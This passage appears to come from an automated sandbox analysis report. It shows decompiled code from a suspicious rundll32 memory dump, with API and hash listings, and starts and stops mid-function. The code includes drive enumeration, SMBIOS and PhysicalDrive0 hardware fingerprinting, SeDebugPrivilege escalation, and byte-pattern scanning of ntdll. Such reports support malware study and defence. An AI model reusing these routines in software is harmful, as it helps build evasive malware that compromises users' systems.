                                                            						E0465DEA0(GetLogicalDriveStringsW, _t74, 0, 2 + _t105 * 2);
                                                            						_t110 = _t109 + 0x10;
                                                            						if(GetLogicalDriveStringsW(_t105, _t74) != 0) {
                                                            							_t49 =  *0x467edb0; // 0x3a0020
                                                            							_v16 = _t49;
                                                            							_t50 =  *0x467edb4; // 0x0
                                                            							_push(0x208);
                                                            							_v12 = _t50;
                                                            							_t51 = L04655B55(_t86, _t105, __eflags);
                                                            							_t111 = _t110 + 4;
                                                            							_t101 = _t51;
                                                            							_t106 = _t74;
                                                            							while(1) {
                                                            								_t87 =  *_t106;
                                                            								_v16 =  *_t106;
                                                            								_t53 = QueryDosDeviceW( &_v16, _t101, 0x104);
                                                            								__eflags = _t53;
                                                            								if(_t53 != 0) {
                                                            									goto L8;
                                                            								}
                                                            								_t64 = GetLastError();
                                                            								__eflags = _t64 - 0x7a;
                                                            								if(_t64 == 0x7a) {
                                                            									L04655B0F(_t101);
                                                            									_t87 =  ~(__eflags > 0) | 2;
                                                            									_push( ~(__eflags > 0) | 2);
                                                            									_t68 = L04655B55( ~(__eflags > 0) | 2, _t106, __eflags);
                                                            									_t111 = _t111 + 8;
                                                            									_t101 = _t68;
                                                            									_t70 = QueryDosDeviceW( &_v16, _t101, 1);
                                                            									__eflags = _t70;
                                                            									if(_t70 != 0) {
                                                            										goto L8;
                                                            									}
                                                            								}
                                                            								L14:
                                                            								L04655B0F(_v544);
                                                            								L04655B0F(_t101);
                                                            								goto L15;
                                                            								L8:
                                                            								_t76 = lstrlenW(_t101);
                                                            								_t56 = E0465F58A(_t76, _t87, _t106,  &_v536, _t101, _t76);
                                                            								_t111 = _t111 + 0xc;
                                                            								__eflags = _t56;
                                                            								if(_t56 == 0) {
                                                            									wsprintfW(_v540, L"%s%s",  &_v16,  &_v536 + _t76 * 2);
                                                            									_t111 = _t111 + 0x10;
                                                            								} else {
                                                            									asm("o16 nop [eax+eax]");
                                                            									do {
                                                            										_t63 =  *_t106 & 0x0000ffff;
                                                            										_t106 =  &(_t106[1]);
                                                            										__eflags = _t63;
                                                            									} while (_t63 != 0);
                                                            									__eflags =  *_t106 - _t63;
                                                            									if( *_t106 != _t63) {
                                                            										continue;
                                                            									}
                                                            								}
                                                            								goto L14;
                                                            							}
                                                            						} else {
                                                            							L04655B0F(_t74);
                                                            							return E04655AFE(_v8 ^ _t107);
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,?,?,?,?,74CB69A0), ref: 0464460E
                                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,74CB69A0), ref: 04644627
                                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 0464466A
                                                            • QueryDosDeviceW.KERNEL32(?,00000000,00000104,?,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 046446C4
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 046446CA
                                                            • QueryDosDeviceW.KERNEL32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 04644706
                                                            • lstrlenW.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,74CB69A0), ref: 0464470D
                                                            • wsprintfW.USER32 ref: 0464475E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeviceDriveLogicalQueryStrings$ErrorFileImageLastNameProcesslstrlenwsprintf
                                                            • String ID: %s%s
                                                            • API String ID: 1509662898-3252725368
                                                            • Opcode ID: afd7742874d045528df7ccfa251ca8762949a59e19d02009054aea029f92b2c2
                                                            • Instruction ID: 1a4ec6ef8a48a96bf64a8fdb45d7e2c760d5ac7b6ec258b92e12486cf5a9b221
                                                            • Opcode Fuzzy Hash: afd7742874d045528df7ccfa251ca8762949a59e19d02009054aea029f92b2c2
                                                            • Instruction Fuzzy Hash: 1F41E971E40208ABEB14AB64DC89FAE73BCDF55304F00006AE90AE7290FE75AE018B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 74%
                                                            			E04646780(void* __ecx, void* __edi, char* __esi) {
                                                            				intOrPtr _v8;
                                                            				signed int _v16;
                                                            				struct _OVERLAPPED* _v32;
                                                            				struct _OVERLAPPED* _v36;
                                                            				void _v40;
                                                            				char _v44;
                                                            				struct _OVERLAPPED* _v48;
                                                            				void* _v52;
                                                            				long _v56;
                                                            				void* _v60;
                                                            				intOrPtr _v64;
                                                            				signed int _t119;
                                                            				_Unknown_base(*)()* _t123;
                                                            				intOrPtr _t125;
                                                            				void* _t126;
                                                            				char _t137;
                                                            				char _t138;
                                                            				intOrPtr _t140;
                                                            				char _t143;
                                                            				intOrPtr _t144;
                                                            				char _t147;
                                                            				intOrPtr _t148;
                                                            				void* _t152;
                                                            				char _t153;
                                                            				intOrPtr _t154;
                                                            				intOrPtr _t155;
                                                            				intOrPtr _t159;
                                                            				intOrPtr _t163;
                                                            				intOrPtr _t167;
                                                            				intOrPtr _t171;
                                                            				void* _t173;
                                                            				intOrPtr _t177;
                                                            				void* _t178;
                                                            				intOrPtr* _t190;
                                                            				intOrPtr* _t192;
                                                            				intOrPtr* _t194;
                                                            				intOrPtr* _t197;
                                                            				intOrPtr* _t199;
                                                            				intOrPtr* _t202;
                                                            				intOrPtr* _t204;
                                                            				intOrPtr* _t206;
                                                            				void* _t207;
                                                            				intOrPtr _t208;
                                                            				intOrPtr _t209;
                                                            				intOrPtr _t210;
                                                            				intOrPtr* _t211;
                                                            				intOrPtr* _t212;
                                                            				intOrPtr* _t214;
                                                            				intOrPtr* _t216;
                                                            				intOrPtr* _t218;
                                                            				void* _t225;
                                                            				long _t226;
                                                            				long _t227;
                                                            				void* _t228;
                                                            				char* _t229;
                                                            				char* _t230;
                                                            				char* _t231;
                                                            				void* _t232;
                                                            				char* _t233;
                                                            				void* _t234;
                                                            				void* _t235;
                                                            				void* _t236;
                                                            				intOrPtr _t237;
                                                            				intOrPtr _t238;
                                                            				intOrPtr* _t245;
                                                            				long _t246;
                                                            				void* _t248;
                                                            				struct _OVERLAPPED* _t251;
                                                            				intOrPtr* _t253;
                                                            				void* _t258;
                                                            				signed int _t261;
                                                            				void* _t262;
                                                            				void* _t263;
                                                            				void* _t264;
                                                            				intOrPtr _t298;
                                                            
                                                            				_t250 = __esi;
                                                            				_t186 = __ecx;
                                                            				_t261 = (_t258 - 0x00000008 & 0xfffffff0) + 4;
                                                            				_v8 =  *((intOrPtr*)(_t258 + 4));
                                                            				_t256 = _t261;
                                                            				_t262 = _t261 - 0x58;
                                                            				_t119 =  *0x4684008; // 0xd355be4e
                                                            				_v16 = _t119 ^ _t261;
                                                            				_push(__esi);
                                                            				asm("xorps xmm0, xmm0");
                                                            				_v48 = 0;
                                                            				asm("movaps [ebp-0x50], xmm0");
                                                            				_t245 = 0;
                                                            				asm("movaps [ebp-0x20], xmm0");
                                                            				_v64 = 0;
                                                            				_t123 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemFirmwareTable");
                                                            				_v56 = _t123;
                                                            				if(_t123 != 0) {
                                                            					_t250 =  *_t123(0x52534d42, 0, 0, 0);
                                                            					_t269 = _t250;
                                                            					if(_t250 != 0) {
                                                            						_push(_t250);
                                                            						_t177 = L04655B55(_t186, _t250, _t269);
                                                            						_t262 = _t262 + 4;
                                                            						_v64 = _t177;
                                                            						if(_t177 != 0) {
                                                            							_t178 = _v56(0x52534d42, 0, _t177, _t250);
                                                            							_t237 = _v64;
                                                            							_t250 = _t237 + 8;
                                                            							_t238 =  *((intOrPtr*)(_t237 + 4));
                                                            							if(_t238 == _t178 + 0xfffffff8) {
                                                            								_t186 = 0;
                                                            								if(_t238 != 0) {
                                                            									while( *_t250 != 1) {
                                                            										_t253 = _t250 + ( *(_t250 + 1) & 0x000000ff);
                                                            										while( *_t253 != _t245) {
                                                            											_t253 = _t253 + 1;
                                                            										}
                                                            										_t186 = _t186 + 1;
                                                            										_t250 = _t253 + 2;
                                                            										_t276 = _t186 - _t238;
                                                            										if(_t186 < _t238) {
                                                            											continue;
                                                            										} else {
                                                            										}
                                                            										goto L11;
                                                            									}
                                                            									_t245 = E04646710(_t250,  *((intOrPtr*)(_t250 + 4)));
                                                            									_t186 = _t250 + 8;
                                                            									E04646680(_t250 + 8, ( *(_v64 + 1) & 0x000000ff) * 0x100 + ( *(_v64 + 2) & 0x000000ff),  &_v44);
                                                            									asm("movaps xmm0, [ebp-0x20]");
                                                            									_t262 = _t262 + 4;
                                                            									asm("movaps [ebp-0x50], xmm0");
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L11:
                                                            				_push(0x2000);
                                                            				_t225 = L04655B55(_t186, _t250, _t276);
                                                            				_t263 = _t262 + 4;
                                                            				_t251 = 0;
                                                            				_v60 = _t225;
                                                            				if(_t225 != 0) {
                                                            					E0465DEA0(_t245, _t225, 0, 0x2000);
                                                            					_t263 = _t263 + 0xc;
                                                            					_v56 = 0;
                                                            					asm("xorps xmm0, xmm0");
                                                            					_v32 = 0;
                                                            					asm("movq [ebp-0x1c], xmm0");
                                                            					_v40 = 0;
                                                            					_v36 = 0;
                                                            					_t173 = CreateFileA("\\\\.\\PhysicalDrive0", 0x80000000, 3, 0, 3, 0, 0);
                                                            					_v52 = _t173;
                                                            					if(_t173 != 0xffffffff) {
                                                            						_t186 =  &_v40;
                                                            						DeviceIoControl(_t173, 0x2d1400,  &_v40, 0xc, _v60, 0x2000,  &_v56, 0);
                                                            						_t251 =  !=  ? _v60 : 0;
                                                            						CloseHandle(_v52);
                                                            					}
                                                            					_t225 = _v60;
                                                            				}
                                                            				if(_t245 == 0) {
                                                            					_t125 = 0;
                                                            					__eflags = 0;
                                                            				} else {
                                                            					_t218 = _t245;
                                                            					_t31 = _t218 + 1; // 0x1
                                                            					_v52 = _t31;
                                                            					do {
                                                            						_t171 =  *_t218;
                                                            						_t218 = _t218 + 1;
                                                            					} while (_t171 != 0);
                                                            					_t186 = _t218 - _v52;
                                                            					_t125 = _t218 - _v52 + 1;
                                                            					_v48 = _t125;
                                                            				}
                                                            				if(_t251 != 0) {
                                                            					_t208 = _t251->OffsetHigh;
                                                            					if(_t208 != 0) {
                                                            						_t216 = _t208 + _t225;
                                                            						_v52 = _t216 + 1;
                                                            						do {
                                                            							_t167 =  *_t216;
                                                            							_t216 = _t216 + 1;
                                                            						} while (_t167 != 0);
                                                            						_t125 = _v48 + 1 + _t216 - _v52;
                                                            						_v48 = _t125;
                                                            					}
                                                            					_t209 = _t251->hEvent;
                                                            					if(_t209 != 0) {
                                                            						_t214 = _t209 + _t225;
                                                            						_v52 = _t214 + 1;
                                                            						do {
                                                            							_t163 =  *_t214;
                                                            							_t214 = _t214 + 1;
                                                            						} while (_t163 != 0);
                                                            						_t125 = _v48 + 1 + _t214 - _v52;
                                                            						_v48 = _t125;
                                                            					}
                                                            					_t210 =  *((intOrPtr*)(_t251 + 0x14));
                                                            					if(_t210 != 0) {
                                                            						_t212 = _t210 + _t225;
                                                            						_v52 = _t212 + 1;
                                                            						do {
                                                            							_t159 =  *_t212;
                                                            							_t212 = _t212 + 1;
                                                            						} while (_t159 != 0);
                                                            						_t125 = _v48 + 1 + _t212 - _v52;
                                                            						_v48 = _t125;
                                                            					}
                                                            					_t186 =  *((intOrPtr*)(_t251 + 0x18));
                                                            					if(_t186 != 0) {
                                                            						_t211 = _t186 + _t225;
                                                            						_t236 = _t211 + 1;
                                                            						do {
                                                            							_t155 =  *_t211;
                                                            							_t211 = _t211 + 1;
                                                            						} while (_t155 != 0);
                                                            						_t186 = _t211 - _t236;
                                                            						_t125 = _v48 + 1 + _t211 - _t236;
                                                            						_t298 = _t125;
                                                            						_v48 = _t125;
                                                            					}
                                                            				}
                                                            				_t126 = _t125 + 0x28;
                                                            				_push(_t126);
                                                            				_v52 = _t126;
                                                            				_t226 = L04655B55(_t186, _t251, _t298);
                                                            				_t264 = _t263 + 4;
                                                            				_v56 = _t226;
                                                            				if(_t226 == 0) {
                                                            					L68:
                                                            					_t246 = _v56;
                                                            				} else {
                                                            					E0465DEA0(_t245, _t226, 0, _v52);
                                                            					_t227 = _v56;
                                                            					_t264 = _t264 + 0xc;
                                                            					asm("movaps xmm0, [ebp-0x50]");
                                                            					 *_t227 = _v48;
                                                            					_t136 = 0x28;
                                                            					_v48 = 0x28;
                                                            					asm("movups [edx+0x4], xmm0");
                                                            					if(_t245 != 0) {
                                                            						 *((intOrPtr*)(_t227 + 0x14)) = 0x28;
                                                            						_t206 = _t245;
                                                            						_t152 = _t227 + 0x28 - _t245;
                                                            						_v52 = _t152;
                                                            						_t235 = _t152;
                                                            						asm("o16 nop [eax+eax]");
                                                            						do {
                                                            							_t153 =  *_t206;
                                                            							_t206 = _t206 + 1;
                                                            							 *((char*)(_t235 + _t206 - 1)) = _t153;
                                                            						} while (_t153 != 0);
                                                            						_t227 = _v56;
                                                            						_t71 = _t245 + 1; // 0x1
                                                            						_t207 = _t71;
                                                            						do {
                                                            							_t154 =  *_t245;
                                                            							_t245 = _t245 + 1;
                                                            						} while (_t154 != 0);
                                                            						_t72 = _t245 - _t207 + 0x29; // 0x2a
                                                            						_t136 = _t72;
                                                            						_v48 = _t136;
                                                            					}
                                                            					if(_t251 == 0) {
                                                            						goto L68;
                                                            					} else {
                                                            						_t248 = _v60;
                                                            						if(_t251->OffsetHigh != 0) {
                                                            							 *((intOrPtr*)(_t227 + 0x18)) = _t136;
                                                            							_t202 = _t251->OffsetHigh + _t248;
                                                            							_t233 = _t227 + _t136;
                                                            							do {
                                                            								_t147 =  *_t202;
                                                            								_t202 = _t202 + 1;
                                                            								 *_t233 = _t147;
                                                            								_t233 = _t233 + 1;
                                                            							} while (_t147 != 0);
                                                            							_t204 = _t251->OffsetHigh + _t248;
                                                            							_t234 = _t204 + 1;
                                                            							do {
                                                            								_t148 =  *_t204;
                                                            								_t204 = _t204 + 1;
                                                            							} while (_t148 != 0);
                                                            							_t227 = _v56;
                                                            							_t136 = _v48 + 1 + _t204 - _t234;
                                                            							_v48 = _t136;
                                                            						}
                                                            						if(_t251->hEvent != 0) {
                                                            							 *((intOrPtr*)(_t227 + 0x1c)) = _t136;
                                                            							_t197 = _t251->hEvent + _t248;
                                                            							_t231 = _t227 + _t136;
                                                            							do {
                                                            								_t143 =  *_t197;
                                                            								_t197 = _t197 + 1;
                                                            								 *_t231 = _t143;
                                                            								_t231 = _t231 + 1;
                                                            							} while (_t143 != 0);
                                                            							_t199 = _t251->hEvent + _t248;
                                                            							_t232 = _t199 + 1;
                                                            							do {
                                                            								_t144 =  *_t199;
                                                            								_t199 = _t199 + 1;
                                                            							} while (_t144 != 0);
                                                            							_t136 = _v48 + 1 + _t199 - _t232;
                                                            							_v48 = _t136;
                                                            						}
                                                            						_t246 = _v56;
                                                            						if( *((intOrPtr*)(_t251 + 0x14)) == 0) {
                                                            							_t228 = _v60;
                                                            						} else {
                                                            							 *((intOrPtr*)(_t246 + 0x20)) = _t136;
                                                            							_t230 = _t136 + _t246;
                                                            							_t192 =  *((intOrPtr*)(_t251 + 0x14)) + _v60;
                                                            							do {
                                                            								_t138 =  *_t192;
                                                            								_t192 = _t192 + 1;
                                                            								 *_t230 = _t138;
                                                            								_t230 = _t230 + 1;
                                                            							} while (_t138 != 0);
                                                            							_t228 = _v60;
                                                            							_t194 =  *((intOrPtr*)(_t251 + 0x14)) + _t228;
                                                            							_v52 = _t194 + 1;
                                                            							do {
                                                            								_t140 =  *_t194;
                                                            								_t194 = _t194 + 1;
                                                            							} while (_t140 != 0);
                                                            							_t136 = _v48 + 1 + _t194 - _v52;
                                                            						}
                                                            						if( *((intOrPtr*)(_t251 + 0x18)) != 0) {
                                                            							 *((intOrPtr*)(_t246 + 0x24)) = _t136;
                                                            							_t190 =  *((intOrPtr*)(_t251 + 0x18)) + _t228;
                                                            							_t229 = _t136 + _t246;
                                                            							do {
                                                            								_t137 =  *_t190;
                                                            								_t190 = _t190 + 1;
                                                            								 *_t229 = _t137;
                                                            								_t229 = _t229 + 1;
                                                            							} while (_t137 != 0);
                                                            						}
                                                            					}
                                                            				}
                                                            				_t128 = _v60;
                                                            				if(_v60 != 0) {
                                                            					L04655B0F(_t128);
                                                            					_t264 = _t264 + 4;
                                                            				}
                                                            				_t129 = _v64;
                                                            				if(_v64 != 0) {
                                                            					L04655B0F(_t129);
                                                            				}
                                                            				return E04655AFE(_v16 ^ _t256);
                                                            			}

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemFirmwareTable,?,00000000), ref: 046467C6
                                                            • GetProcAddress.KERNEL32(00000000), ref: 046467CD
                                                            • CreateFileA.KERNEL32(\\.\PhysicalDrive0,80000000,00000003,00000000,00000003,00000000,00000000), ref: 046468D2
                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002000,?,00000000), ref: 046468F9
                                                            • CloseHandle.KERNEL32(?), ref: 04646908
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Handle$AddressCloseControlCreateDeviceFileModuleProc
                                                            • String ID: GetSystemFirmwareTable$\\.\PhysicalDrive0$kernel32
                                                            • API String ID: 2970610107-3170356133
                                                            • Opcode ID: c4047c7bbdd84de509cd58c539448159f41a7c1fa60b0b55aa887b37984ee12e
                                                            • Instruction ID: d34440171f22425ac9f5e59d83c48b460cb45a5cf080b565c43e049a49f14a17
                                                            • Opcode Fuzzy Hash: c4047c7bbdd84de509cd58c539448159f41a7c1fa60b0b55aa887b37984ee12e
                                                            • Instruction Fuzzy Hash: E8E1E674A002059FCF19CF68D854AEDBBF1FF9A314B18825DD446A7341F736A946CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E0464AC90(WCHAR* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                            				void* _v28;
                                                            				signed int _t11;
                                                            				void* _t22;
                                                            				WCHAR* _t32;
                                                            				signed int _t36;
                                                            
                                                            				_t11 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t11 ^ _t36;
                                                            				_t32 = __ecx;
                                                            				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                            					_v24.PrivilegeCount = 1;
                                                            					_v12 = 2;
                                                            					LookupPrivilegeValueW(0, _t32,  &(_v24.Privileges));
                                                            					AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0);
                                                            					GetLastError();
                                                            					_t35 =  !=  ? 0 : 1;
                                                            					CloseHandle(_v28);
                                                            					_t22 =  !=  ? 0 : 1;
                                                            					return E04655AFE(_v8 ^ _t36);
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t36);
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000000,00000000,?,?,04649E8E), ref: 0464ACAF
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,04649E8E), ref: 0464ACB6
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,04649E8E), ref: 0464ACE1
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,04649E8E), ref: 0464ACF6
                                                            • GetLastError.KERNEL32(?,?,04649E8E), ref: 0464ACFC
                                                            • CloseHandle.KERNEL32(?,?,?,04649E8E), ref: 0464AD0C
                                                            Strings
                                                            • SeIncreaseQuotaPrivilege, xrefs: 0464ACD7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID: SeIncreaseQuotaPrivilege
                                                            • API String ID: 3398352648-3255188008
                                                            • Opcode ID: 084d230b489129cac4dc68a5f3ec679145c15de7b8bf08555800d02aa85c6e7c
                                                            • Instruction ID: 07eb62131cb33655f3a842cb53451f201cd44218fe3ea12b626532143ec4b87f
                                                            • Opcode Fuzzy Hash: 084d230b489129cac4dc68a5f3ec679145c15de7b8bf08555800d02aa85c6e7c
                                                            • Instruction Fuzzy Hash: 1211A575B40209AFDB149FA4EC0DBBE7BB8EF44711F000069F90AE6190EE755D048B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E0464AD30(void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                            				void* _v28;
                                                            				signed int _t11;
                                                            				void* _t22;
                                                            				signed int _t33;
                                                            
                                                            				_t11 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t11 ^ _t33;
                                                            				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                            					_v24.PrivilegeCount = 1;
                                                            					_v12 = 2;
                                                            					LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &(_v24.Privileges));
                                                            					AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0);
                                                            					GetLastError();
                                                            					_t32 =  !=  ? 0 : 1;
                                                            					CloseHandle(_v28);
                                                            					_t22 =  !=  ? 0 : 1;
                                                            					return E04655AFE(_v8 ^ _t33);
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t33);
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,ntdll.dll,76A20320,00000000,?), ref: 0464AD4C
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,ntdll.dll,76A20320,00000000,?), ref: 0464AD53
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0464AD81
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,ntdll.dll,76A20320), ref: 0464AD96
                                                            • GetLastError.KERNEL32(?,?,?,ntdll.dll,76A20320), ref: 0464AD9C
                                                            • CloseHandle.KERNEL32(?,?,?,?,ntdll.dll,76A20320), ref: 0464ADAC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 3398352648-2896544425
                                                            • Opcode ID: ae3ce1b3aea2ded4b4cb429fbc0bc10989960e7fcc2efa629251cc5e130fdac7
                                                            • Instruction ID: fee9d7816a63975d05458c0121f7f9747c67978472c160d9b37c8030635eb7d2
                                                            • Opcode Fuzzy Hash: ae3ce1b3aea2ded4b4cb429fbc0bc10989960e7fcc2efa629251cc5e130fdac7
                                                            • Instruction Fuzzy Hash: 3D018471A40209ABDB14AFA4DC4EBBE7BB8EF08711F000059F90AE6191EF755D048B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 26%
                                                            			E0463C560(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                            				signed int _v8;
                                                            				short _v12;
                                                            				char _v14;
                                                            				short _v16;
                                                            				intOrPtr _v20;
                                                            				short _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v296;
                                                            				intOrPtr _v300;
                                                            				intOrPtr _v304;
                                                            				char _v308;
                                                            				intOrPtr _v312;
                                                            				intOrPtr _v316;
                                                            				intOrPtr _v320;
                                                            				intOrPtr _v324;
                                                            				signed int _t101;
                                                            				_Unknown_base(*)()* _t108;
                                                            				void* _t113;
                                                            				intOrPtr _t114;
                                                            				intOrPtr _t115;
                                                            				void* _t139;
                                                            				intOrPtr* _t140;
                                                            				intOrPtr* _t150;
                                                            				intOrPtr* _t153;
                                                            				intOrPtr* _t157;
                                                            				void* _t158;
                                                            				void* _t160;
                                                            				void* _t161;
                                                            				void* _t162;
                                                            				void* _t169;
                                                            				void* _t170;
                                                            				intOrPtr _t175;
                                                            				void* _t176;
                                                            				void* _t182;
                                                            				intOrPtr* _t188;
                                                            				signed int _t189;
                                                            				void* _t191;
                                                            				void* _t197;
                                                            				intOrPtr _t198;
                                                            				void* _t200;
                                                            				void* _t202;
                                                            				void* _t203;
                                                            				void* _t205;
                                                            				void* _t209;
                                                            				void* _t211;
                                                            				void* _t214;
                                                            				void* _t217;
                                                            				struct HINSTANCE__* _t220;
                                                            				void* _t221;
                                                            				void* _t222;
                                                            				void* _t223;
                                                            				void* _t224;
                                                            				void* _t225;
                                                            				void* _t226;
                                                            				signed int _t227;
                                                            
                                                            				_t197 = __edi;
                                                            				_t101 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t101 ^ _t227;
                                                            				_v324 = _a4;
                                                            				_v316 = _a8;
                                                            				_t220 = GetModuleHandleA("ntdll");
                                                            				if(_t220 == 0) {
                                                            					L91:
                                                            					return E04655AFE(_v8 ^ _t227);
                                                            				} else {
                                                            					E0465DEA0(__edi,  &_v308, 0, 0x114);
                                                            					_t108 = GetProcAddress(_t220, "RtlGetVersion");
                                                            					if(_t108 == 0) {
                                                            						goto L91;
                                                            					} else {
                                                            						_push( &_v308);
                                                            						if( *_t108() != 0 || _t220->i != 0x5a4d) {
                                                            							goto L91;
                                                            						} else {
                                                            							_t188 =  *((intOrPtr*)(_t220 + 0x3c)) + _t220;
                                                            							if( *_t188 != 0x4550) {
                                                            								goto L91;
                                                            							} else {
                                                            								_t157 = 0;
                                                            								_t113 = ( *(_t188 + 0x14) & 0x0000ffff) + 0x18 + _t188;
                                                            								_t189 =  *(_t188 + 6) & 0x0000ffff;
                                                            								if(_t189 == 0) {
                                                            									goto L91;
                                                            								} else {
                                                            									while(( *(_t113 + 0x24) & 0x20000000) == 0) {
                                                            										_t157 = _t157 + 1;
                                                            										_t113 = _t113 + 0x28;
                                                            										if(_t157 < _t189) {
                                                            											continue;
                                                            										} else {
                                                            											return E04655AFE(_v8 ^ _t227);
                                                            										}
                                                            										goto L92;
                                                            									}
                                                            									_push(_t197);
                                                            									_t198 =  *((intOrPtr*)(_t113 + 0x10));
                                                            									_v320 = _t198;
                                                            									_t191 =  *((intOrPtr*)(_t113 + 0xc)) + _t220;
                                                            									if(_t191 == 0 || _t198 == 0) {
                                                            										L90:
                                                            										goto L91;
                                                            									} else {
                                                            										_t114 = _v304;
                                                            										if(_t114 != 0xa) {
                                                            											if(_t114 != 6) {
                                                            												goto L90;
                                                            											} else {
                                                            												_t115 = _v300;
                                                            												if(_t115 == 3) {
                                                            													goto L35;
                                                            												} else {
                                                            													if(_t115 != 2) {
                                                            														if(_t115 != 1) {
                                                            															goto L90;
                                                            														} else {
                                                            															_t223 = 0;
                                                            															_v20 = 0x8b55ff8b;
                                                            															_v16 = 0x56ec;
                                                            															_t203 = _t198 + 0xfffffff9;
                                                            															_v14 = 0x68;
                                                            															_v312 = 0x38e05d89;
                                                            															do {
                                                            																_t161 = 0;
                                                            																while( *((intOrPtr*)(_t161 + _t223 + _t191)) ==  *((intOrPtr*)(_t227 + _t161 - 0x10))) {
                                                            																	_t161 = _t161 + 1;
                                                            																	if(_t161 < 7) {
                                                            																		continue;
                                                            																	}
                                                            																	break;
                                                            																}
                                                            																if(_t161 == 7) {
                                                            																	_t153 = _t223 + _t191;
                                                            																	if(_t153 == 0) {
                                                            																		goto L90;
                                                            																	} else {
                                                            																		_t224 = 0;
                                                            																		_t205 = _v320 + 0xfffffffc;
                                                            																		do {
                                                            																			_t162 = 0;
                                                            																			while( *((intOrPtr*)(_t162 + _t224 + _t191)) ==  *((intOrPtr*)(_t227 + _t162 - 0x134))) {
                                                            																				_t162 = _t162 + 1;
                                                            																				if(_t162 < 4) {
                                                            																					continue;
                                                            																				}
                                                            																				break;
                                                            																			}
                                                            																			if(_t162 == 4) {
                                                            																				goto L76;
                                                            																			} else {
                                                            																				goto L74;
                                                            																			}
                                                            																			goto L92;
                                                            																			L74:
                                                            																			_t224 = _t224 + 1;
                                                            																		} while (_t224 <= _t205);
                                                            																		return E04655AFE(_v8 ^ _t227);
                                                            																	}
                                                            																} else {
                                                            																	goto L66;
                                                            																}
                                                            																goto L92;
                                                            																L66:
